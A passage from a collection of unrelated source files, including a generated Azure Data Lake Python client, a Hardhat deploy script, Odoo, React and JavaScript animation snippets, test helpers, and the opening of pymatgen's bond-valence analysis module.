     intermediate flush to a file stream and the final close of a file stream. The close query
     parameter is valid only when the action is "flush" and change notifications are enabled. If the
     value of close is "true" and the flush operation completes successfully, the service raises a
     file change notification with a property indicating that this is the final update (the file
     stream has been closed). If "false" a change notification is raised indicating the file has
     changed. The default is false. This query parameter is set to true by the Hadoop ABFS driver to
     indicate that the file stream has been closed.".
    :type close: bool
    :param content_length: Required for "Append Data" and "Flush Data". Must be 0 for "Flush
     Data". Must be the length of the request content in bytes for "Append Data".
    :type content_length: long
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param path_http_headers: Parameter group.
    :type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map well-known HTTP status codes to typed azure-core exceptions; callers
    # may override/extend the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group models into the individual values
    # used to build request headers below.
    _content_md5 = None
    _lease_id = None
    _cache_control = None
    _content_type = None
    _content_disposition = None
    _content_encoding = None
    _content_language = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    if path_http_headers is not None:
        _content_md5 = path_http_headers.content_md5
        _cache_control = path_http_headers.cache_control
        _content_type = path_http_headers.content_type
        _content_disposition = path_http_headers.content_disposition
        _content_encoding = path_http_headers.content_encoding
        _content_language = path_http_headers.content_language
    # Constant query value selecting this operation on the shared PATCH endpoint.
    action = "flush"
    accept = "application/json"

    # Construct URL from the operation's metadata template ('/{filesystem}/{path}').
    url = self.flush_data.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct query parameters; 'action' is always sent.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['action'] = self._serialize.query("action", action, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    if position is not None:
        query_parameters['position'] = self._serialize.query("position", position, 'long')
    if retain_uncommitted_data is not None:
        query_parameters['retainUncommittedData'] = self._serialize.query("retain_uncommitted_data", retain_uncommitted_data, 'bool')
    if close is not None:
        query_parameters['close'] = self._serialize.query("close", close, 'bool')

    # Construct request headers, including path HTTP headers and conditional-access headers.
    header_parameters = {}  # type: Dict[str, Any]
    if content_length is not None:
        header_parameters['Content-Length'] = self._serialize.header("content_length", content_length, 'long', minimum=0)
    if _content_md5 is not None:
        header_parameters['x-ms-content-md5'] = self._serialize.header("content_md5", _content_md5, 'bytearray')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if _cache_control is not None:
        header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
    if _content_type is not None:
        header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
    if _content_disposition is not None:
        header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
    if _content_encoding is not None:
        header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
    if _content_language is not None:
        header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.patch(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    response_headers = {}
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
    response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))

    if cls:
        return cls(pipeline_response, None, response_headers)

flush_data.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def append_data(
    self,
    body,  # type: IO
    position=None,  # type: Optional[int]
    timeout=None,  # type: Optional[int]
    content_length=None,  # type: Optional[int]
    transactional_content_crc64=None,  # type: Optional[bytearray]
    request_id_parameter=None,  # type: Optional[str]
    path_http_headers=None,  # type: Optional["_models.PathHTTPHeaders"]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Append data to the file.

    Issues ``PATCH {filesystem}/{path}?action=append`` with ``body`` streamed as the
    request content. The data is staged at ``position`` and is not visible until a
    subsequent flush. A 202 response is the success path.

    :param body: Initial data.
    :type body: IO
    :param position: This parameter allows the caller to upload data in parallel and control the
     order in which it is appended to the file. It is required when uploading data to be appended
     to the file and when flushing previously uploaded data to the file. The value must be the
     position where the data is to be appended. Uploaded data is not immediately flushed, or
     written, to the file. To flush, the previously uploaded data must be contiguous, the position
     parameter must be specified and equal to the length of the file after all data has been
     written, and there must not be a request entity body included with the request.
    :type position: long
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param content_length: Required for "Append Data" and "Flush Data". Must be 0 for "Flush
     Data". Must be the length of the request content in bytes for "Append Data".
    :type content_length: long
    :param transactional_content_crc64: Specify the transactional crc64 for the body, to be
     validated by the service.
    :type transactional_content_crc64: bytearray
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param path_http_headers: Parameter group.
    :type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map service status codes onto azure-core exception types; callers may
    # extend/override the mapping via an `error_map` kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    # Flatten the optional parameter-group objects into the individual values
    # that are serialized as headers below.
    _transactional_content_hash = None
    _lease_id = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if path_http_headers is not None:
        _transactional_content_hash = path_http_headers.transactional_content_hash
    action = "append"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self.append_data.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['action'] = self._serialize.query("action", action, 'str')
    if position is not None:
        query_parameters['position'] = self._serialize.query("position", position, 'long')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    if content_length is not None:
        header_parameters['Content-Length'] = self._serialize.header("content_length", content_length, 'long', minimum=0)
    if _transactional_content_hash is not None:
        header_parameters['Content-MD5'] = self._serialize.header("transactional_content_hash", _transactional_content_hash, 'bytearray')
    if transactional_content_crc64 is not None:
        header_parameters['x-ms-content-crc64'] = self._serialize.header("transactional_content_crc64", transactional_content_crc64, 'bytearray')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # The body is passed through as a stream (not serialized as JSON).
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['stream_content'] = body
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 202 Accepted is the only success status for "Append Data".
    if response.status_code not in [202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize selected response headers so `cls` callbacks can use them.
    response_headers = {}
    response_headers['Date'] = self._deserialize('rfc-1123', response.headers.get('Date'))
    response_headers['x-ms-request-id'] = self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-client-request-id'] = self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-version'] = self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['ETag'] = self._deserialize('str', response.headers.get('ETag'))
    response_headers['Content-MD5'] = self._deserialize('bytearray', response.headers.get('Content-MD5'))
    response_headers['x-ms-content-crc64'] = self._deserialize('bytearray', response.headers.get('x-ms-content-crc64'))
    response_headers['x-ms-request-server-encrypted'] = self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted'))

    if cls:
        return cls(pipeline_response, None, response_headers)

append_data.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def set_expiry(
    self,
    expiry_options,  # type: Union[str, "_models.PathExpiryOptions"]
    timeout=None,  # type: Optional[int]
    request_id_parameter=None,  # type: Optional[str]
    expires_on=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Sets the time a blob will expire and be deleted.

    Issues ``PUT {filesystem}/{path}?comp=expiry`` carrying the expiry mode
    (``x-ms-expiry-option``) and optional expiry time (``x-ms-expiry-time``).

    :param expiry_options: Required. Indicates mode of the expiry time.
    :type expiry_options: str or ~azure.storage.filedatalake.models.PathExpiryOptions
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param expires_on: The time to set the blob to expiry.
    :type expires_on: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map service status codes onto azure-core exception types; callers may
    # extend/override the mapping via an `error_map` kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    comp = "expiry"
    accept = "application/json"

    # Construct URL
    url = self.set_expiry.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-expiry-option'] = self._serialize.header("expiry_options", expiry_options, 'str')
    if expires_on is not None:
        header_parameters['x-ms-expiry-time'] = self._serialize.header("expires_on", expires_on, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.put(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 OK is the only success status for "Set Expiry".
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize selected response headers so `cls` callbacks can use them.
    response_headers = {}
    response_headers['ETag'] = self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified'] = self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['x-ms-client-request-id'] = self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id'] = self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version'] = self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['Date'] = self._deserialize('rfc-1123', response.headers.get('Date'))

    if cls:
        return cls(pipeline_response, None, response_headers)

set_expiry.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
|
const hre = require("hardhat");

// Deploy the Greeter contract and print its address.
async function main() {
  const factory = await hre.ethers.getContractFactory("Greeter");
  const contract = await factory.deploy("Hello, Hardhat!");
  await contract.deployed();
  console.log("Greeter deployed to:", contract.address);
}

// We recommend this pattern to be able to use async/await everywhere
// and properly handle errors.
main().then(
  () => process.exit(0),
  (error) => {
    console.error(error);
    process.exit(1);
  }
);
|
###################################################################################
#
# Copyright (c) 2017-2019 MuK IT GmbH.
#
# This file is part of MuK Web Utils
# (see https://mukit.at).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###################################################################################
import base64
import logging
import mimetypes
from odoo import api, models, fields, _
from odoo.exceptions import AccessError
from odoo.tools.mimetypes import guess_mimetype
_logger = logging.getLogger(__name__)
class IrAttachment(models.Model):
    """Extend ``ir.attachment`` with a flag marking an attachment as temporary."""

    _inherit = 'ir.attachment'

    #----------------------------------------------------------
    # Database
    #----------------------------------------------------------

    # NOTE(review): the help text says temporary attachments are removed by
    # autovacuum; the cleanup itself is implemented elsewhere, not in this file.
    temporary = fields.Boolean(
        string="Temporary",
        default=False,
        help="Attachments will be deleted by Autovacuum.",
    )
|
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSArray.h"
// Category declaration recovered by class-dump; declaration only, the
// implementation is not visible here.
@interface NSArray (uniAttribute)
- (void)setInAttributes:(id)arg1 withName:(id)arg2 andType:(id)arg3; // IMP=0x00000001007993e4
@end
|
import React from 'react';
import { ph_title, ph_body } from './Sections';
import PropTypes from 'prop-types';
import '../styles/Section.css';
const TextContent = ({ title, body }) => {
return (
<div className="text-content">
<h2>{ title ? title : ph_title }</h2>
<p>{ body ? body : ph_body }</p>
</div>
);
}
TextContent.propTypes = {
title: PropTypes.string.isRequired,
body: PropTypes.string.isRequired
};
export default TextContent;
|
// Typewriter animation driven entirely by data-attributes on `element`.
var Typer = function(element) {
  this.element = element;

  // Word list: data-words split on data-delim, empty entries discarded.
  var delim = element.dataset.delim || ",";
  var rawWords = element.dataset.words || "override these,sample typing";
  this.words = rawWords.split(delim).filter(function(w) { return w; });

  this.delay = element.dataset.delay || 200;

  // data-loop: "false" means a single pass; anything else is kept as-is
  // (the default string "true" never stops the animation).
  this.loop = element.dataset.loop || "true";
  if (this.loop === "false") { this.loop = 1 }

  this.deleteDelay = element.dataset.deletedelay || element.dataset.deleteDelay || 800;

  // Mutable animation state shared with doTyping().
  this.progress = { word: 0, char: 0, building: true, looped: 0 };
  this.typing = true;

  // One color per word, cycling; start with the first one.
  this.colors = (element.dataset.colors || "black").split(",");
  this.colorIndex = 0;
  this.element.style.color = this.colors[0];

  this.doTyping();
};
// Resume the animation; a no-op when it is already running.
Typer.prototype.start = function() {
  if (this.typing) { return; }
  this.typing = true;
  this.doTyping();
};
// Halt the animation; the pending tick checks this flag before rescheduling.
Typer.prototype.stop = function() { this.typing = false; };
// One animation tick: render the current prefix of the current word, then
// advance the build/delete state machine and schedule the next tick.
Typer.prototype.doTyping = function() {
  var e = this.element;
  var p = this.progress;
  var w = p.word;
  var c = p.char;
  // Spread splits by code point, so surrogate-pair characters are not cut in half.
  var currentDisplay = [...this.words[w]].slice(0, c).join("");
  var atWordEnd;
  if (this.cursor) {
    // Hold the cursor solid while typing and restart its blink cycle.
    this.cursor.element.style.opacity = "1";
    this.cursor.on = true;
    clearInterval(this.cursor.interval);
    this.cursor.interval = setInterval(() => this.cursor.updateBlinkState(), 400);
  }
  e.innerHTML = currentDisplay;
  if (p.building) {
    atWordEnd = p.char === this.words[w].length;
    if (atWordEnd) {
      // Word complete: switch to deleting on the next tick.
      p.building = false;
    } else {
      p.char += 1;
    }
  } else {
    if (p.char === 0) {
      // Word fully deleted: advance to the next word and cycle the color.
      p.building = true;
      p.word = (p.word + 1) % this.words.length;
      this.colorIndex = (this.colorIndex + 1) % this.colors.length;
      this.element.style.color = this.colors[this.colorIndex];
    } else {
      p.char -= 1;
    }
  }
  if (p.word === this.words.length - 1) {
    p.looped += 1;
  }
  // NOTE(review): with the default loop = "true" this comparison is a
  // string-vs-number check that is always false, i.e. infinite looping —
  // presumably intentional; confirm.
  if (!p.building && this.loop <= p.looped){
    this.typing = false;
  }
  // atWordEnd is undefined during the delete phase, so the shorter `delay`
  // applies; the long `deleteDelay` pause only happens at a completed word.
  setTimeout(() => {
    if (this.typing) { this.doTyping() };
  }, atWordEnd ? this.deleteDelay : this.delay);
};
// Blinking cursor bound to `element`; the glyph comes from data attributes.
var Cursor = function(element) {
  this.element = element;
  this.on = true;

  this.cursorDisplay =
    element.dataset.cursordisplay || element.dataset.cursorDisplay || "_";
  element.innerHTML = this.cursorDisplay;
  element.style.transition = "all 0.1s";

  // Blink every 400ms until cleared.
  this.interval = setInterval(() => this.updateBlinkState(), 400);
}
// Flip the cursor between visible and hidden.
Cursor.prototype.updateBlinkState = function() {
  this.on = !this.on;
  this.element.style.opacity = this.on ? "1" : "0";
}
// Wire up every .typer element plus its optional start/stop buttons.
// Buttons reference their typer through data-owner (the typer element's id).
function TyperSetup() {
  var typers = {};
  for (const el of document.getElementsByClassName("typer")) {
    typers[el.id] = new Typer(el);
  }
  for (const btn of document.getElementsByClassName("typer-stop")) {
    const owner = typers[btn.dataset.owner];
    btn.onclick = function() { owner.stop(); };
  }
  for (const btn of document.getElementsByClassName("typer-start")) {
    const owner = typers[btn.dataset.owner];
    btn.onclick = function() { owner.start(); };
  }
  // Cursor wiring (.cursor elements) was intentionally left disabled here.
}
TyperSetup();
|
// Native entry point: delegate to the shared tile implementation and run its
// side-effectful initializer immediately.
import shared from "../tile-g/shared-tile-g.native";
shared();
|
var common = require("../common-tap.js")
var test = require("tap").test
var npm = require("../../")
var mkdirp = require("mkdirp")
var rimraf = require("rimraf")
var mr = require("npm-registry-mock")
// config
// Fixture directory with its own npm cache so the test does not touch the
// user's real cache.
var pkg = __dirname + "/outdated-git"
mkdirp.sync(pkg + "/cache")
// Verifies that `npm outdated` reports git dependencies with the expected
// kind markers and resolved git URLs.
// FIX: corrected the typo "dicovers" -> "discovers" in the test description.
test("discovers new versions in outdated", function (t) {
  process.chdir(pkg)
  t.plan(5)
  npm.load({cache: pkg + "/cache", registry: common.registry}, function () {
    npm.commands.outdated([], function (er, d) {
      // d rows: [dir, dep, current, wanted, latest, req]
      t.equal('git', d[0][3])
      t.equal('git', d[0][4])
      t.equal('git://github.com/robertkowalski/foo-private.git', d[0][5])
      t.equal('git://user:pass@github.com/robertkowalski/foo-private.git', d[1][5])
      t.equal('git+https://github.com/robertkowalski/foo', d[2][5])
    })
  })
})
// Tear down: remove the npm cache created for the fixture.
test("cleanup", function (t) {
  var cacheDir = pkg + "/cache"
  rimraf.sync(cacheDir)
  t.end()
})
|
import asyncio
from aiohttp.test_utils import AioHTTPTestCase
from .app.web import setup_app
from ...base import BaseTracerTestCase
class TraceTestCase(BaseTracerTestCase, AioHTTPTestCase):
    """
    Base class that provides a valid ``aiohttp`` application with
    the async tracer.
    """

    def enable_tracing(self):
        # Hook for subclasses: activate tracing before the app is exercised.
        pass

    def disable_tracing(self):
        # Hook for subclasses: undo whatever enable_tracing() set up.
        pass

    def tearDown(self):
        # unpatch the aiohttp_jinja2 module
        super(TraceTestCase, self).tearDown()
        self.disable_tracing()

    def get_app(self, loop=None):
        """
        Override the get_app method to return the test application
        """
        # aiohttp 2.0+ stores the loop instance in self.loop; for
        # backward compatibility, we should expect a `loop` argument
        loop = loop or self.loop
        # create the app with the testing loop
        self.app = setup_app(loop)
        asyncio.set_event_loop(loop)
        # trace the app
        self.enable_tracing()
        return self.app
|
// Pick the API root: the local mock server when ?useMockApi is present in the
// current URL, the deployed Heroku app otherwise.
export default function getBaseUrl() {
  const useMock = getQueryStringParameterByName("useMockApi");
  if (useMock) {
    return "http://localhost:3001/";
  }
  return "https://mysterious-dawn-16770.herokuapp.com/";
}
// Returns the value of query-string parameter `name` from `url` (defaults to
// the current page URL). Returns null when absent, "" when present without a
// value; "+" is decoded as a space.
function getQueryStringParameterByName(name, url) {
  if (!url) url = window.location.href;
  // BUG FIX: escape literal "[" and "]" in the name. The previous pattern
  // /[[]]/g matched the two-character sequence "[]" (char class containing
  // "[" followed by a literal "]"), so names like "items[0]" produced a
  // broken lookup regex instead of escaped brackets.
  name = name.replace(/[[\]]/g, "\\$&");
  var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
    results = regex.exec(url);
  if (!results) return null;
  if (!results[2]) return "";
  return decodeURIComponent(results[2].replace(/\+/g, " "));
}
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module implements classes to perform bond valence analyses.
"""
import collections
import functools
import operator
import os
from math import exp, sqrt
import numpy as np
from monty.serialization import loadfn
from pymatgen.core.periodic_table import Element, Species, get_el_sp
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
# Let's initialize some module level properties.
# List of electronegative elements specified in M. O'Keefe, & N. Brese,
# JACS, 1991, 113(9), 3226-3229. doi:10.1021/ja00009a002.
ELECTRONEG = [
    Element(sym)
    for sym in [
        "H",
        "B",
        "C",
        "Si",
        "N",
        "P",
        "As",
        "Sb",
        "O",
        "S",
        "Se",
        "Te",
        "F",
        "Cl",
        "Br",
        "I",
    ]
]

module_dir = os.path.dirname(os.path.abspath(__file__))

# Read in BV parameters.
# BV_PARAMS maps Element -> the "r"/"c" bond-valence parameters shipped with
# this module in bvparam_1991.yaml.
BV_PARAMS = {}
for k, v in loadfn(os.path.join(module_dir, "bvparam_1991.yaml")).items():
    BV_PARAMS[Element(k)] = v

# Read in yaml containing data-mined ICSD BV data.
# ICSD_BV_DATA: Species -> mined BV-sum statistics; PRIOR_PROB: Species ->
# occurrence frequency in the ICSD, used as the prior in the MAP estimate.
all_data = loadfn(os.path.join(module_dir, "icsd_bv.yaml"))
ICSD_BV_DATA = {Species.from_string(sp): data for sp, data in all_data["bvsum"].items()}
PRIOR_PROB = {Species.from_string(sp): data for sp, data in all_data["occurrence"].items()}
def calculate_bv_sum(site, nn_list, scale_factor=1.0):
    """
    Calculates the BV sum of a site.

    Args:
        site (PeriodicSite): The central site to calculate the bond valence
        nn_list ([Neighbor]): A list of namedtuple Neighbors having "distance"
            and "site" attributes
        scale_factor (float): A scale factor to be applied. This is useful for
            scaling distance, esp in the case of calculation-relaxed structures
            which may tend to under (GGA) or over bind (LDA).
    """
    central = Element(site.specie.symbol)
    total = 0
    for neighbor in nn_list:
        other = Element(neighbor.specie.symbol)
        # Only unlike-element pairs where at least one partner is
        # electronegative contribute to the sum.
        if other == central:
            continue
        if central not in ELECTRONEG and other not in ELECTRONEG:
            continue
        p1, p2 = BV_PARAMS[central], BV_PARAMS[other]
        r1, c1 = p1["r"], p1["c"]
        r2, c2 = p2["r"], p2["c"]
        # O'Keefe & Brese expression for the bond-valence parameter R.
        R = r1 + r2 - r1 * r2 * (sqrt(c1) - sqrt(c2)) ** 2 / (c1 * r1 + c2 * r2)
        vij = exp((R - neighbor.nn_distance * scale_factor) / 0.31)
        # Sign follows relative electronegativity of the pair.
        total += vij if central.X < other.X else -vij
    return total
def calculate_bv_sum_unordered(site, nn_list, scale_factor=1):
    """
    Calculates the BV sum of a site for unordered structures.

    Each partial occupancy on the central site is paired with each partial
    occupancy on each neighbor; the fully-occupied bond valence is weighted
    by the product of the two occupancies.

    Args:
        site (PeriodicSite): The central site to calculate the bond valence
        nn_list ([Neighbor]): A list of namedtuple Neighbors having "distance"
            and "site" attributes
        scale_factor (float): A scale factor to be applied. This is useful for
            scaling distance, esp in the case of calculation-relaxed structures
            which may tend to under (GGA) or over bind (LDA).
    """
    total = 0
    for central_sp, central_occu in site.species.items():
        central = Element(central_sp.symbol)
        for neighbor in nn_list:
            for other_sp, other_occu in neighbor.species.items():
                other = Element(other_sp.symbol)
                # Same contribution rule as the ordered case.
                if other == central:
                    continue
                if central not in ELECTRONEG and other not in ELECTRONEG:
                    continue
                p1, p2 = BV_PARAMS[central], BV_PARAMS[other]
                r1, c1 = p1["r"], p1["c"]
                r2, c2 = p2["r"], p2["c"]
                R = r1 + r2 - r1 * r2 * (sqrt(c1) - sqrt(c2)) ** 2 / (c1 * r1 + c2 * r2)
                vij = exp((R - neighbor.nn_distance * scale_factor) / 0.31)
                signed = vij if central.X < other.X else -vij
                total += central_occu * other_occu * signed
    return total
class BVAnalyzer:
    """
    This class implements a maximum a posteriori (MAP) estimation method to
    determine oxidation states in a structure. The algorithm is as follows:
    1) The bond valence sum of all symmetrically distinct sites in a structure
    is calculated using the element-based parameters in M. O'Keefe, & N. Brese,
    JACS, 1991, 113(9), 3226-3229. doi:10.1021/ja00009a002.
    2) The posterior probabilities of all oxidation states is then calculated
    using: P(oxi_state/BV) = K * P(BV/oxi_state) * P(oxi_state), where K is
    a constant factor for each element. P(BV/oxi_state) is calculated as a
    Gaussian with mean and std deviation determined from an analysis of
    the ICSD. The posterior P(oxi_state) is determined from a frequency
    analysis of the ICSD.
    3) The oxidation states are then ranked in order of decreasing probability
    and the oxidation state combination that result in a charge neutral cell
    is selected.
    """

    # Maximum deviation from exact charge neutrality accepted when assigning
    # valences to unordered (fractionally occupied) structures.
    CHARGE_NEUTRALITY_TOLERANCE = 0.00001

    def __init__(
        self,
        symm_tol=0.1,
        max_radius=4,
        max_permutations=100000,
        distance_scale_factor=1.015,
        charge_neutrality_tolerance=CHARGE_NEUTRALITY_TOLERANCE,
        forbidden_species=None,
    ):
        """
        Initializes the BV analyzer, with useful defaults.

        Args:
            symm_tol:
                Symmetry tolerance used to determine which sites are
                symmetrically equivalent. Set to 0 to turn off symmetry.
            max_radius:
                Maximum radius in Angstrom used to find nearest neighbors.
            max_permutations:
                The maximum number of permutations of oxidation states to test.
            distance_scale_factor:
                A scale factor to be applied. This is useful for scaling
                distances, esp in the case of calculation-relaxed structures
                which may tend to under (GGA) or over bind (LDA). The default
                of 1.015 works for GGA. For experimental structure, set this to
                1.
            charge_neutrality_tolerance:
                Tolerance on the charge neutrality when unordered structures
                are at stake.
            forbidden_species:
                List of species that are forbidden (example : ["O-"] cannot be
                used) It is used when e.g. someone knows that some oxidation
                state cannot occur for some atom in a structure or list of
                structures.
        """
        self.symm_tol = symm_tol
        self.max_radius = max_radius
        self.max_permutations = max_permutations
        self.dist_scale_factor = distance_scale_factor
        self.charge_neutrality_tolerance = charge_neutrality_tolerance
